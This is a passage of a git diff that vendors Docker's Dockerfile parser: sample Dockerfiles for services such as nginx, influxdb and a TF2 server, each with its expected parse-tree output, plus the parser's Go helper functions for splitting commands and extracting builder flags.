+COPY --doit=true foo /tmp/
+COPY --user=me --doit=true foo /tmp/
+COPY --doit=true -- foo /tmp/
+COPY -- foo /tmp/
+CMD --doit [ "a", "b" ]
+CMD --doit=true -- [ "a", "b" ]
+CMD --doit -- [ ]
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/result
new file mode 100644
index 0000000000..4578f4cba4
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/flags/result
@@ -0,0 +1,10 @@
+(from "scratch")
+(copy "foo" "/tmp/")
+(copy ["--user=me"] "foo" "/tmp/")
+(copy ["--doit=true"] "foo" "/tmp/")
+(copy ["--user=me" "--doit=true"] "foo" "/tmp/")
+(copy ["--doit=true"] "foo" "/tmp/")
+(copy "foo" "/tmp/")
+(cmd ["--doit"] "a" "b")
+(cmd ["--doit=true"] "a" "b")
+(cmd ["--doit"])
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/Dockerfile
new file mode 100644
index 0000000000..081e442882
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/Dockerfile
@@ -0,0 +1,10 @@
+FROM debian
+ADD check.sh main.sh /app/
+CMD /app/main.sh
+HEALTHCHECK
+HEALTHCHECK --interval=5s --timeout=3s --retries=3 \
+  CMD /app/check.sh --quiet
+HEALTHCHECK CMD
+HEALTHCHECK   CMD   a b
+HEALTHCHECK --timeout=3s CMD ["foo"]
+HEALTHCHECK CONNECT TCP 7000
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/result
new file mode 100644
index 0000000000..092924f88c
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/health/result
@@ -0,0 +1,9 @@
+(from "debian")
+(add "check.sh" "main.sh" "/app/")
+(cmd "/app/main.sh")
+(healthcheck)
+(healthcheck ["--interval=5s" "--timeout=3s" "--retries=3"] "CMD" "/app/check.sh --quiet")
+(healthcheck "CMD")
+(healthcheck "CMD" "a b")
+(healthcheck ["--timeout=3s"] "CMD" "foo")
+(healthcheck "CONNECT" "TCP 7000")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/Dockerfile
new file mode 100644
index 0000000000..587fb9b54b
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/Dockerfile
@@ -0,0 +1,15 @@
+FROM ubuntu:14.04
+
+RUN apt-get update && apt-get install wget -y
+RUN wget http://s3.amazonaws.com/influxdb/influxdb_latest_amd64.deb
+RUN dpkg -i influxdb_latest_amd64.deb
+RUN rm -r /opt/influxdb/shared
+
+VOLUME /opt/influxdb/shared
+
+CMD /usr/bin/influxdb --pidfile /var/run/influxdb.pid -config /opt/influxdb/shared/config.toml
+
+EXPOSE 8083
+EXPOSE 8086
+EXPOSE 8090
+EXPOSE 8099
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/result
new file mode 100644
index 0000000000..0998e87e63
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/influxdb/result
@@ -0,0 +1,11 @@
+(from "ubuntu:14.04")
+(run "apt-get update && apt-get install wget -y")
+(run "wget http://s3.amazonaws.com/influxdb/influxdb_latest_amd64.deb")
+(run "dpkg -i influxdb_latest_amd64.deb")
+(run "rm -r /opt/influxdb/shared")
+(volume "/opt/influxdb/shared")
+(cmd "/usr/bin/influxdb --pidfile /var/run/influxdb.pid -config /opt/influxdb/shared/config.toml")
+(expose "8083")
+(expose "8086")
+(expose "8090")
+(expose "8099")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/Dockerfile
new file mode 100644
index 0000000000..39fe27d99c
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/Dockerfile
@@ -0,0 +1 @@
+CMD "[\"echo\", \"Phew, I just managed to escaped those double quotes\"]"
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/result
new file mode 100644
index 0000000000..afc220c2a7
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string-double/result
@@ -0,0 +1 @@
+(cmd "\"[\\\"echo\\\", \\\"Phew, I just managed to escaped those double quotes\\\"]\"")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/Dockerfile
new file mode 100644
index 0000000000..eaae081a06
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/Dockerfile
@@ -0,0 +1 @@
+CMD '["echo", "Well, JSON in a string is JSON too?"]'
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/result
new file mode 100644
index 0000000000..484804e2b2
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-json-inside-string/result
@@ -0,0 +1 @@
+(cmd "'[\"echo\", \"Well, JSON in a string is JSON too?\"]'")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/Dockerfile
new file mode 100644
index 0000000000..c3ac63c07a
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/Dockerfile
@@ -0,0 +1 @@
+CMD ['echo','single quotes are invalid JSON']
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/result
new file mode 100644
index 0000000000..6147891207
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-single-quotes/result
@@ -0,0 +1 @@
+(cmd "['echo','single quotes are invalid JSON']")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/Dockerfile
new file mode 100644
index 0000000000..5fd4afa522
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/Dockerfile
@@ -0,0 +1 @@
+CMD ["echo", "Please, close the brackets when you're done"
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/result
new file mode 100644
index 0000000000..1ffbb8ff85
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-bracket/result
@@ -0,0 +1 @@
+(cmd "[\"echo\", \"Please, close the brackets when you're done\"")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/Dockerfile
new file mode 100644
index 0000000000..30cc4bb48f
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/Dockerfile
@@ -0,0 +1 @@
+CMD ["echo", "look ma, no quote!]
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/result
new file mode 100644
index 0000000000..32048147b5
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/jeztah-invalid-json-unterminated-string/result
@@ -0,0 +1 @@
+(cmd "[\"echo\", \"look ma, no quote!]")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/Dockerfile
new file mode 100644
index 0000000000..a586917110
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/Dockerfile
@@ -0,0 +1,8 @@
+CMD []
+CMD [""]
+CMD ["a"]
+CMD ["a","b"]
+CMD [ "a", "b" ]
+CMD [	"a",	"b"	]
+CMD	[	"a",	"b"	]	
+CMD ["abc 123", "♥", "☃", "\" \\ \/ \b \f \n \r \t \u0000"]
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/result
new file mode 100644
index 0000000000..c6553e6e1a
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/json/result
@@ -0,0 +1,8 @@
+(cmd)
+(cmd "")
+(cmd "a")
+(cmd "a" "b")
+(cmd "a" "b")
+(cmd "a" "b")
+(cmd "a" "b")
+(cmd "abc 123" "♥" "☃" "\" \\ / \b \f \n \r \t \x00")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/Dockerfile
new file mode 100644
index 0000000000..35f9c24aa6
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/Dockerfile
@@ -0,0 +1,7 @@
+FROM ubuntu:14.04
+MAINTAINER James Turnbull "james@example.com"
+ENV REFRESHED_AT 2014-06-01
+RUN apt-get update
+RUN apt-get -y install redis-server redis-tools
+EXPOSE 6379
+ENTRYPOINT [ "/usr/bin/redis-server" ]
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/result
new file mode 100644
index 0000000000..b5ac6fe445
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/kartar-entrypoint-oddities/result
@@ -0,0 +1,7 @@
+(from "ubuntu:14.04")
+(maintainer "James Turnbull \"james@example.com\"")
+(env "REFRESHED_AT" "2014-06-01")
+(run "apt-get update")
+(run "apt-get -y install redis-server redis-tools")
+(expose "6379")
+(entrypoint "/usr/bin/redis-server")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/Dockerfile
new file mode 100644
index 0000000000..188395fe83
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/Dockerfile
@@ -0,0 +1,48 @@
+FROM busybox:buildroot-2014.02
+
+MAINTAINER docker <docker@docker.io>
+
+ONBUILD RUN ["echo", "test"]
+ONBUILD RUN echo test
+ONBUILD COPY . /
+
+
+# RUN Commands \
+# linebreak in comment \
+RUN ["ls", "-la"]
+RUN ["echo", "'1234'"]
+RUN echo "1234"
+RUN echo 1234
+RUN echo '1234' && \
+    echo "456" && \
+    echo 789
+RUN    sh -c 'echo root:testpass \
+        > /tmp/passwd'
+RUN mkdir -p /test /test2 /test3/test
+
+# ENV \
+ENV SCUBA 1 DUBA 3
+ENV SCUBA "1 DUBA 3"
+
+# CMD \
+CMD ["echo", "test"]
+CMD echo test
+CMD echo "test"
+CMD echo 'test'
+CMD echo 'test' | wc -
+
+#EXPOSE\
+EXPOSE 3000
+EXPOSE 9000 5000 6000
+
+USER docker
+USER docker:root
+
+VOLUME ["/test"]
+VOLUME ["/test", "/test2"]
+VOLUME /test3
+
+WORKDIR /test
+
+ADD . /
+COPY . copy
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/result
new file mode 100644
index 0000000000..6f7d57a396
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/lk4d4-the-edge-case-generator/result
@@ -0,0 +1,29 @@
+(from "busybox:buildroot-2014.02")
+(maintainer "docker <docker@docker.io>")
+(onbuild (run "echo" "test"))
+(onbuild (run "echo test"))
+(onbuild (copy "." "/"))
+(run "ls" "-la")
+(run "echo" "'1234'")
+(run "echo \"1234\"")
+(run "echo 1234")
+(run "echo '1234' &&     echo \"456\" &&     echo 789")
+(run "sh -c 'echo root:testpass         > /tmp/passwd'")
+(run "mkdir -p /test /test2 /test3/test")
+(env "SCUBA" "1 DUBA 3")
+(env "SCUBA" "\"1 DUBA 3\"")
+(cmd "echo" "test")
+(cmd "echo test")
+(cmd "echo \"test\"")
+(cmd "echo 'test'")
+(cmd "echo 'test' | wc -")
+(expose "3000")
+(expose "9000" "5000" "6000")
+(user "docker")
+(user "docker:root")
+(volume "/test")
+(volume "/test" "/test2")
+(volume "/test3")
+(workdir "/test")
+(add "." "/")
+(copy "." "copy")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/Dockerfile
new file mode 100644
index 0000000000..f64c1168c1
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/Dockerfile
@@ -0,0 +1,16 @@
+FROM ubuntu:14.04
+
+RUN apt-get update -qy && apt-get install mutt offlineimap vim-nox abook elinks curl tmux cron zsh -y
+ADD .muttrc /
+ADD .offlineimaprc /
+ADD .tmux.conf /
+ADD mutt /.mutt
+ADD vim /.vim
+ADD vimrc /.vimrc
+ADD crontab /etc/crontab
+RUN chmod 644 /etc/crontab
+RUN mkdir /Mail
+RUN mkdir /.offlineimap
+RUN echo "export TERM=screen-256color" >/.zshenv
+
+CMD setsid cron; tmux -2
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/result
new file mode 100644
index 0000000000..a0efcf04b6
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mail/result
@@ -0,0 +1,14 @@
+(from "ubuntu:14.04")
+(run "apt-get update -qy && apt-get install mutt offlineimap vim-nox abook elinks curl tmux cron zsh -y")
+(add ".muttrc" "/")
+(add ".offlineimaprc" "/")
+(add ".tmux.conf" "/")
+(add "mutt" "/.mutt")
+(add "vim" "/.vim")
+(add "vimrc" "/.vimrc")
+(add "crontab" "/etc/crontab")
+(run "chmod 644 /etc/crontab")
+(run "mkdir /Mail")
+(run "mkdir /.offlineimap")
+(run "echo \"export TERM=screen-256color\" >/.zshenv")
+(cmd "setsid cron; tmux -2")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/Dockerfile
new file mode 100644
index 0000000000..57bb5976a3
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/Dockerfile
@@ -0,0 +1,3 @@
+FROM foo
+
+VOLUME /opt/nagios/var /opt/nagios/etc /opt/nagios/libexec /var/log/apache2 /usr/share/snmp/mibs
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/result
new file mode 100644
index 0000000000..18dbdeeaa0
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/multiple-volumes/result
@@ -0,0 +1,2 @@
+(from "foo")
+(volume "/opt/nagios/var" "/opt/nagios/etc" "/opt/nagios/libexec" "/var/log/apache2" "/usr/share/snmp/mibs")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/Dockerfile
new file mode 100644
index 0000000000..5b9ec06a6c
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/Dockerfile
@@ -0,0 +1,7 @@
+FROM ubuntu:14.04
+
+RUN apt-get update && apt-get install libcap2-bin mumble-server -y
+
+ADD ./mumble-server.ini /etc/mumble-server.ini
+
+CMD /usr/sbin/murmurd
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/result
new file mode 100644
index 0000000000..a0036a943e
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/mumble/result
@@ -0,0 +1,4 @@
+(from "ubuntu:14.04")
+(run "apt-get update && apt-get install libcap2-bin mumble-server -y")
+(add "./mumble-server.ini" "/etc/mumble-server.ini")
+(cmd "/usr/sbin/murmurd")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/Dockerfile
new file mode 100644
index 0000000000..bf8368e1ca
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/Dockerfile
@@ -0,0 +1,14 @@
+FROM ubuntu:14.04
+MAINTAINER Erik Hollensbe <erik@hollensbe.org>
+
+RUN apt-get update && apt-get install nginx-full -y
+RUN rm -rf /etc/nginx
+ADD etc /etc/nginx
+RUN chown -R root:root /etc/nginx
+RUN /usr/sbin/nginx -qt
+RUN mkdir /www
+
+CMD ["/usr/sbin/nginx"]
+
+VOLUME /www
+EXPOSE 80
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/result
new file mode 100644
index 0000000000..56ddb6f258
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/nginx/result
@@ -0,0 +1,11 @@
+(from "ubuntu:14.04")
+(maintainer "Erik Hollensbe <erik@hollensbe.org>")
+(run "apt-get update && apt-get install nginx-full -y")
+(run "rm -rf /etc/nginx")
+(add "etc" "/etc/nginx")
+(run "chown -R root:root /etc/nginx")
+(run "/usr/sbin/nginx -qt")
+(run "mkdir /www")
+(cmd "/usr/sbin/nginx")
+(volume "/www")
+(expose "80")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/Dockerfile
new file mode 100644
index 0000000000..72b79bdd7d
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/Dockerfile
@@ -0,0 +1,23 @@
+FROM ubuntu:12.04
+
+EXPOSE 27015
+EXPOSE 27005
+EXPOSE 26901
+EXPOSE 27020
+
+RUN apt-get update && apt-get install libc6-dev-i386 curl unzip -y
+RUN mkdir -p /steam
+RUN curl http://media.steampowered.com/client/steamcmd_linux.tar.gz | tar vxz -C /steam
+ADD ./script /steam/script
+RUN /steam/steamcmd.sh +runscript /steam/script
+RUN curl http://mirror.pointysoftware.net/alliedmodders/mmsource-1.10.0-linux.tar.gz | tar vxz -C /steam/tf2/tf
+RUN curl http://mirror.pointysoftware.net/alliedmodders/sourcemod-1.5.3-linux.tar.gz | tar vxz -C /steam/tf2/tf
+ADD ./server.cfg /steam/tf2/tf/cfg/server.cfg
+ADD ./ctf_2fort.cfg /steam/tf2/tf/cfg/ctf_2fort.cfg
+ADD ./sourcemod.cfg /steam/tf2/tf/cfg/sourcemod/sourcemod.cfg
+RUN rm -r /steam/tf2/tf/addons/sourcemod/configs
+ADD ./configs /steam/tf2/tf/addons/sourcemod/configs
+RUN mkdir -p /steam/tf2/tf/addons/sourcemod/translations/en
+RUN cp /steam/tf2/tf/addons/sourcemod/translations/*.txt /steam/tf2/tf/addons/sourcemod/translations/en
+
+CMD cd /steam/tf2 && ./srcds_run -port 27015 +ip 0.0.0.0 +map ctf_2fort -autoupdate -steam_dir /steam -steamcmd_script /steam/script +tf_bot_quota 12 +tf_bot_quota_mode fill
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/result
new file mode 100644
index 0000000000..d4f94cd8be
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/tf2/result
@@ -0,0 +1,20 @@
+(from "ubuntu:12.04")
+(expose "27015")
+(expose "27005")
+(expose "26901")
+(expose "27020")
+(run "apt-get update && apt-get install libc6-dev-i386 curl unzip -y")
+(run "mkdir -p /steam")
+(run "curl http://media.steampowered.com/client/steamcmd_linux.tar.gz | tar vxz -C /steam")
+(add "./script" "/steam/script")
+(run "/steam/steamcmd.sh +runscript /steam/script")
+(run "curl http://mirror.pointysoftware.net/alliedmodders/mmsource-1.10.0-linux.tar.gz | tar vxz -C /steam/tf2/tf")
+(run "curl http://mirror.pointysoftware.net/alliedmodders/sourcemod-1.5.3-linux.tar.gz | tar vxz -C /steam/tf2/tf")
+(add "./server.cfg" "/steam/tf2/tf/cfg/server.cfg")
+(add "./ctf_2fort.cfg" "/steam/tf2/tf/cfg/ctf_2fort.cfg")
+(add "./sourcemod.cfg" "/steam/tf2/tf/cfg/sourcemod/sourcemod.cfg")
+(run "rm -r /steam/tf2/tf/addons/sourcemod/configs")
+(add "./configs" "/steam/tf2/tf/addons/sourcemod/configs")
+(run "mkdir -p /steam/tf2/tf/addons/sourcemod/translations/en")
+(run "cp /steam/tf2/tf/addons/sourcemod/translations/*.txt /steam/tf2/tf/addons/sourcemod/translations/en")
+(cmd "cd /steam/tf2 && ./srcds_run -port 27015 +ip 0.0.0.0 +map ctf_2fort -autoupdate -steam_dir /steam -steamcmd_script /steam/script +tf_bot_quota 12 +tf_bot_quota_mode fill")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/Dockerfile
new file mode 100644
index 0000000000..4842088166
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/Dockerfile
@@ -0,0 +1,9 @@
+FROM ubuntu:14.04
+
+RUN apt-get update -qy && apt-get install tmux zsh weechat-curses -y
+
+ADD .weechat /.weechat
+ADD .tmux.conf /
+RUN echo "export TERM=screen-256color" >/.zshenv
+
+CMD zsh -c weechat
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/result
new file mode 100644
index 0000000000..c3abb4c54f
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/weechat/result
@@ -0,0 +1,6 @@
+(from "ubuntu:14.04")
+(run "apt-get update -qy && apt-get install tmux zsh weechat-curses -y")
+(add ".weechat" "/.weechat")
+(add ".tmux.conf" "/")
+(run "echo \"export TERM=screen-256color\" >/.zshenv")
+(cmd "zsh -c weechat")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/Dockerfile b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/Dockerfile
new file mode 100644
index 0000000000..3a4da6e916
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/Dockerfile
@@ -0,0 +1,7 @@
+FROM ubuntu:14.04
+MAINTAINER Erik Hollensbe <erik@hollensbe.org>
+
+RUN apt-get update && apt-get install znc -y
+ADD conf /.znc
+
+CMD [ "/usr/bin/znc", "-f", "-r" ]
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/result b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/result
new file mode 100644
index 0000000000..5493b255fd
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/testfiles/znc/result
@@ -0,0 +1,5 @@
+(from "ubuntu:14.04")
+(maintainer "Erik Hollensbe <erik@hollensbe.org>")
+(run "apt-get update && apt-get install znc -y")
+(add "conf" "/.znc")
+(cmd "/usr/bin/znc" "-f" "-r")
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/parser/utils.go b/vendor/github.com/docker/docker/builder/dockerfile/parser/utils.go
new file mode 100644
index 0000000000..cd7af75e79
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/parser/utils.go
@@ -0,0 +1,176 @@
+package parser
+
+import (
+	"fmt"
+	"strconv"
+	"strings"
+	"unicode"
+)
+
+// Dump dumps the AST defined by `node` as a list of sexps.
+// Returns a string suitable for printing.
+func (node *Node) Dump() string {
+	str := ""
+	str += node.Value
+
+	if len(node.Flags) > 0 {
+		str += fmt.Sprintf(" %q", node.Flags)
+	}
+
+	for _, n := range node.Children {
+		str += "(" + n.Dump() + ")\n"
+	}
+
+	if node.Next != nil {
+		for n := node.Next; n != nil; n = n.Next {
+			if len(n.Children) > 0 {
+				str += " " + n.Dump()
+			} else {
+				str += " " + strconv.Quote(n.Value)
+			}
+		}
+	}
+
+	return strings.TrimSpace(str)
+}
+
+// performs the dispatch based on the two primal strings, cmd and args. Please
+// look at the dispatch table in parser.go to see how these dispatchers work.
+func fullDispatch(cmd, args string, d *Directive) (*Node, map[string]bool, error) {
+	fn := dispatch[cmd]
+
+	// Ignore invalid Dockerfile instructions
+	if fn == nil {
+		fn = parseIgnore
+	}
+
+	sexp, attrs, err := fn(args, d)
+	if err != nil {
+		return nil, nil, err
+	}
+
+	return sexp, attrs, nil
+}
+
+// splitCommand takes a single line of text and parses out the cmd and args,
+// which are used for dispatching to more exact parsing functions.
+func splitCommand(line string) (string, []string, string, error) {
+	var args string
+	var flags []string
+
+	// Make sure we get the same results irrespective of leading/trailing spaces
+	cmdline := tokenWhitespace.Split(strings.TrimSpace(line), 2)
+	cmd := strings.ToLower(cmdline[0])
+
+	if len(cmdline) == 2 {
+		var err error
+		args, flags, err = extractBuilderFlags(cmdline[1])
+		if err != nil {
+			return "", nil, "", err
+		}
+	}
+
+	return cmd, flags, strings.TrimSpace(args), nil
+}
+
+// covers comments and empty lines. Lines should be trimmed before passing to
+// this function.
+func stripComments(line string) string {
+	// string is already trimmed at this point
+	if tokenComment.MatchString(line) {
+		return tokenComment.ReplaceAllString(line, "")
+	}
+
+	return line
+}
+
+func extractBuilderFlags(line string) (string, []string, error) {
+	// Parses the BuilderFlags and returns the remaining part of the line
+
+	const (
+		inSpaces = iota // looking for start of a word
+		inWord
+		inQuote
+	)
+
+	words := []string{}
+	phase := inSpaces
+	word := ""
+	quote := '\000'
+	blankOK := false
+	var ch rune
+
+	for pos := 0; pos <= len(line); pos++ {
+		if pos != len(line) {
+			ch = rune(line[pos])
+		}
+
+		if phase == inSpaces { // Looking for start of word
+			if pos == len(line) { // end of input
+				break
+			}
+			if unicode.IsSpace(ch) { // skip spaces
+				continue
+			}
+
+			// Only keep going if the next word starts with --
+			if ch != '-' || pos+1 == len(line) || rune(line[pos+1]) != '-' {
+				return line[pos:], words, nil
+			}
+
+			phase = inWord // found someting with "--", fall through
+		}
+		if (phase == inWord || phase == inQuote) && (pos == len(line)) {
+			if word != "--" && (blankOK || len(word) > 0) {
+				words = append(words, word)
+			}
+			break
+		}
+		if phase == inWord {
+			if unicode.IsSpace(ch) {
+				phase = inSpaces
+				if word == "--" {
+					return line[pos:], words, nil
+				}
+				if blankOK || len(word) > 0 {
+					words = append(words, word)
+				}
+				word = ""
+				blankOK = false
+				continue
+			}
+			if ch == '\'' || ch == '"' {
+				quote = ch
+				blankOK = true
+				phase = inQuote
+				continue
+			}
+			if ch == '\\' {
+				if pos+1 == len(line) {
+					continue // just skip \ at end
+				}
+				pos++
+				ch = rune(line[pos])
+			}
+			word += string(ch)
+			continue
+		}
+		if phase == inQuote {
+			if ch == quote {
+				phase = inWord
+				continue
+			}
+			if ch == '\\' {
+				if pos+1 == len(line) {
+					phase = inWord
+					continue // just skip \ at end
+				}
+				pos++
+				ch = rune(line[pos])
+			}
+			word += string(ch)
+		}
+	}
+
+	return "", words, nil
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/shell_parser.go b/vendor/github.com/docker/docker/builder/dockerfile/shell_parser.go
new file mode 100644
index 0000000000..189afd1fdb
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/shell_parser.go
@@ -0,0 +1,329 @@
+package dockerfile
+
+// This will take a single word and an array of env variables and
+// process all quotes (" and ') as well as $xxx and ${xxx} env variable
+// tokens.  Tries to mimic bash shell process.
+// It doesn't support all flavors of ${xx:...} formats but new ones can
